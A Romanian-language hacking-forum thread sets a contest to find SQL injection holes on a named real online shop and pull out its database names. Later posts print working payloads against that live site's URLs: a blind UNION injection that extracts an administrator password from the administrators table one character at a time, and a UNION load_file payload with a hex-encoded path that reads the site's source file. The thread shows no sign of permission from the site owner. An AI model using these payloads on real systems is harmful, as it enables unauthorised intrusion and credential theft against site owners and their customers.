Jump to content
tdxev

SQL Injection

Recommended Posts

Posted

Scopul este g?sirea vulnerabilitati SQL si aflarea bazelor de date folosind

acea vulnerabilitate.

Fiecare care va reusi sa gaseasca numele bazelor de date

va post numele uniea dintre ele ! (nu postati linkul folosit)

Pentru a valida faptul ca nu a folosit alta vulnerabilitarte din site

trimite-ti si link-ul prin PM catre mine.

Toate link-urile vor fi facute publice la finalul competitiei.

Puteti sa folositi orice program doriti

(dar recomand lucru manual pentru ca o sa face-ti ceva trafic pe site

daca folositi toti programe)!!!

Site:


http://www.military-shop.ro/

moreInfo:

user():webweb2

dataBase():militaryshop

version():5.0.51a

Incep primul:


albumfoto

Vulnerabilitatea o voi anunta peste o saptamana, asa ca mai sunt 7 zile :)

Posted

a fost deja anuntata de mine "dataBase():militaryshop"

ea poate fi gasita simplu printr-o erroare MySql

"select 1 from numeTabelCeNuExista"

Alta inafara de mysql, information_scheme,test :P mai sunt aproximativ 30 si ceva...

Posted

Gata azi raportez vulnerabilitatile!

Am facut acest post pentru ca initial am crezut ca era vorba de un singur parametru vulnerabil in site acela fiind un blind injection!

Parametru gasit de mine:

http://www.military-shop.ro/advanced_search_result.php?keywords=

Sintaxa folosita

http://www.military-shop.ro/advanced_search_result.php?keywords=
xxxxx%' union distinct select 1,28 FROM mysql.user WHERE substring((select distinct (user_password) FRoM administrators limit 0,1),1,1)='0' %23

Parametru gasit de ROFL (care a gasit calea cea mai usoara) va fi afisat dupa ce vor rezolva problema!

LATER:

Parametru gasit de ROLF este:

http://www.military-shop.ro/index.php?products_id=

Sintaxa:

http://www.military-shop.ro/index.php?products_id=-2326 union select 1,load_file(0x2f7661722f7777772f6d696c69746172792d73686f702e726f2f696e6465782e706870)--

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...